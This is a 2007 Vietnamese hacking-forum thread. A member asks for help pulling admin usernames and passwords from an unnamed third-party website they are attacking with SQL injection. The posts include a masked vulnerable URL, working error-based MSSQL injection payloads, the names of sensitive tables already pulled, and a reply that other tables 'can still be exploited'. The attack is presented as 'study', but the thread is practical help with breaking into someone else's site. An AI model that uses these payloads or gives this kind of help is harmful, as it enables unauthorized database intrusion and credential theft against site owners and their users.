English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận thâm nhập lấy được table , column , nhưng ko lấy được user+pass admin  XML
  [Question]   lấy được table , column , nhưng ko lấy được user+pass admin 26/09/2007 22:51:24 (+0700) | #1 | 87137
hlcm
Member
[Minus]    0    [Plus]
Joined: 25/09/2007 00:06:14
Messages: 3
Offline
[Profile] [PM]
mình get dc table colum , nhung khi chèn câu lệnh lấy user pass thì nó báo như vậy

Microsoft OLE DB Provider for SQL Server error '80040e14'

Incorrect syntax near the keyword 'and'.

/codingscripts/COScripts_Config.asp, line 94

ai giúp với ...
[Up] [Print Copy]
  [Question]   Re: lấy được table , column , nhưng ko lấy được user+pass admin 27/09/2007 04:52:30 (+0700) | #2 | 87204
[Avatar]
 darthtuan
HVA Friend
Joined: 10/08/2003 11:57:02
Messages: 312
Location: Trại cai nghiện
Offline
[Profile] [PM] [WWW]
Dòng lệnh lấy user pass là gì?
[Up] [Print Copy]
  [Question]   Re: lấy được table , column , nhưng ko lấy được user+pass admin 27/09/2007 09:35:09 (+0700) | #3 | 87277
hlcm
Member
[Minus]    0    [Plus]
Joined: 25/09/2007 00:06:14
Messages: 3
Offline
[Profile] [PM]
mình nói trước phục vụ mục đích nghiên cứu học tập 99%

link lỗi : http://xxx.com/productdisplay.asp?catid=1'

------------------------
lệnh này mình lấy table
and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
------------------------
mình dùng lệnh này lấy user
and 1=convert(int,(select top 1 username from userlogin))--sp_password
------------------------
các table và column mình lấy dc , nhờ mod check dùm
table : userlogin , admin_passwords , .... ( toàn table nhạy cảm >,< )
column thì chỉ lấy 1 trong các table trên thôi vì nhiều quá :
trong table userlogin có 3 column : username , password , userld

mod check dùm mình nhe , vì mình lấy dc table và cloumn rồi , đến câu lệnh để lấy user và pass thì bị ko dc

xin cảm ơn


[Up] [Print Copy]
  [Question]   Re: lấy được table , column , nhưng ko lấy được user+pass admin 28/09/2007 21:32:16 (+0700) | #4 | 87658
[Avatar]
 darthtuan
HVA Friend
Joined: 10/08/2003 11:57:02
Messages: 312
Location: Trại cai nghiện
Offline
[Profile] [PM] [WWW]
Vì column : username , password , userid trong userlogin là rỗng. Còn các table khác vẫn có thể khai thác được.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|